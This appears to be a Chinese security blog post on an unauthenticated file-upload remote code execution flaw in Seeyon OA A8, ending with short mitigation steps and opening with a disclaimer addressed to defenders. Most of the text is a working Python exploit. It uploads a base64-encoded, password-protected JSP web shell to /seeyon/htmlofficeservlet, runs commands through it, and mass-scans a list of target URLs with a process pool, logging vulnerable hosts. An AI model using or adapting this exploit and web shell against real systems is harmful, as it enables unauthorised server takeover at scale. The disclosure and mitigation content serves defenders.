[TOC]

注意：本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。

0x00 前言

RCE-远程代码执行

致远 OA A8 协同管理软件被曝存在远程代码执行漏洞0day
漏洞成因：
致远 A8+ 某些版本系统，存在远程任意文件上传文件上传漏洞，并且无需登录即可触发。攻击者构造恶意文件，成功利用漏洞后可造成Getshell。同时该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露，安全过滤处理措施不足，使得用户在无需认证的情况下实现任意文件上传。攻击者利用该漏洞，可在未授权的情况下，远程发送精心构造的网站后门文件，从而获取目标服务器权限，在目标服务器上执行任意代码。

已验证影响版本：

• A8 V7.0 SP3
• A8 V6.1 SP2
• (V6.1 SP1 验证尚不存在，其他版本未验证)

POC:

# Wednesday, 26 June 2019
# Author:nianhua
# Blog:https://github.com/nian-hua/
# python3 版本
 
import re
import requests
import base64
from multiprocessing import Pool, Manager
 
def send_payload(url):
 
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 
    payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
 
    payload = base64.b64decode(payload)
 
    try:
        r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
        r = requests.get(
            url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
 
        if "wangming" in r.text:
            return url
        else:
            return 0
    except:
        return 0
 
def remove_control_chars(s):
    control_chars = ''.join(map(chr, list(range(0,32)) + list(range(127,160))))
    
    control_char_re = re.compile('[%s]' % re.escape(control_chars))
 
    s = control_char_re.sub('', s)
 
    if 'http' not in s:
 
        s = 'http://' + s
 
    return s
 
def savePeopleInformation(url, queue):
 
    newurl = send_payload(url)
 
    if newurl != 0:
 
        fw = open('loophole.txt', 'a')
        fw.write(newurl + '\n')
        fw.close()
 
    queue.put(url)
 
def main():
 

    pool = Pool(10)
 
    queue = Manager().Queue()
 
    fr = open('url.txt', 'r')
 
    lines = fr.readlines()
 
    for i in lines:
 
        url = remove_control_chars(i)
 
        pool.apply_async(savePeopleInformation, args=(url, queue,))
 
    allnum = len(lines)
 
    num = 0
 
    while True:
 
        print(queue.get())
 
        num += 1
 
        if num >= allnum:
 
            fr.close()
 
            break
 
if "__main__" == __name__:
 
    main()

缓解措施：

• 漏洞位置为：/seeyon/htmlofficeservlet可以对该地址配置ACL规则。
• 或者联系官方获取补丁程序，官网地址：http://www.seeyon.com/Info/constant.html

临时修补方案如下：
1、配置URL访问控制策略；
2、在公网部署的致远A8+服务器，通过ACL禁止外网对“/seeyon/htmlofficeservlet”路径的访问；
3、对OA服务器上的网站后门文件进行及时查杀。